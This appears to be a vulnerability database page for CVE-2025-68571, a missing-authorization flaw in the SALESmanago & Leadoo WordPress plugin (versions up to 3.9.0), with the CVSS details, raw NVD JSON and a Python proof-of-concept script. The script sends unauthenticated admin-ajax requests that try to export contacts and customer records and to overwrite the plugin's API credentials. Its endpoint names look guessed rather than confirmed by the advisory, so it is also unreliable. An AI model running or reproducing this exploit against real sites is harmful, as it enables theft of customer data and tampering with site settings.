Security Vulnerability Report
中文
CVE-2025-68571 CVSS 5.3 MEDIUM

CVE-2025-68571

Published: 2025-12-24 13:16:24
Last Modified: 2026-04-27 19:16:32

Description

Missing Authorization vulnerability in SALESmanago SALESmanago & Leadoo salesmanago allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects SALESmanago & Leadoo: from n/a through <= 3.9.0.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

SALESmanago & Leadoo salesmanago WordPress Plugin <= 3.9.0
SALESmanago & Leadoo salesmanago WordPress Plugin from n/a through 3.9.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68571 PoC - SALESmanago Missing Authorization # Affected: SALESmanago & Leadoo salesmanago WordPress Plugin <= 3.9.0 import requests import sys def exploit_cve_2025_68571(target_url): """ PoC for Missing Authorization vulnerability in SALESmanago plugin This demonstrates how an unauthenticated user can access admin functions """ print(f"[*] Testing CVE-2025-68571 on {target_url}") print(f"[*] Target: SALESmanago WordPress Plugin <= 3.9.0") # Common WordPress AJAX endpoint ajax_endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Plugin-specific endpoints that should require authentication vulnerable_endpoints = [ # SALESmanago plugin AJAX actions { "action": "salesmanago_admin_action", "data": {"task": "export_contacts", "format": "json"} }, { "action": "salesmanago_sync", "data": {"sync_type": "full", "force": "true"} }, { "action": "salesmanago_update_settings", "data": {"api_key": "test", "api_secret": "test"} }, { "action": "salesmanago_export_data", "data": {"type": "customers", "limit": 1000} } ] for endpoint in vulnerable_endpoints: print(f"\n[*] Testing endpoint: {endpoint['action']}") # Send request WITHOUT authentication data = endpoint['data'] data['action'] = endpoint['action'] try: response = requests.post( ajax_endpoint, data=data, timeout=10, headers={ "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "Content-Type": "application/x-www-form-urlencoded" } ) print(f"[*] Status Code: {response.status_code}") print(f"[*] Response Length: {len(response.text)} bytes") # Check if we got admin-level response without auth if response.status_code == 200: if "salesmanago" in response.text.lower() or "api_key" in response.text.lower(): print(f"[!] VULNERABLE: Endpoint {endpoint['action']} accessible without auth!") print(f"[+] Response preview: {response.text[:500]}") else: print(f"[*] Endpoint returned data (needs manual verification)") except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") print("\n[*] Scan complete") print("[*] Note: Manual verification required for confirmation") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-68571-poc.py <target_url>") print("Example: python cve-2025-68571-poc.py http://example.com") sys.exit(1) target = sys.argv[1].rstrip('/') exploit_cve_2025_68571(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68571", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:24.070", "lastModified": "2026-04-27T19:16:31.747", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in SALESmanago SALESmanago & Leadoo salesmanago allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects SALESmanago & Leadoo: from n/a through <= 3.9.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/salesmanago/vulnerability/wordpress-salesmanago-plugin-3-9-0-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}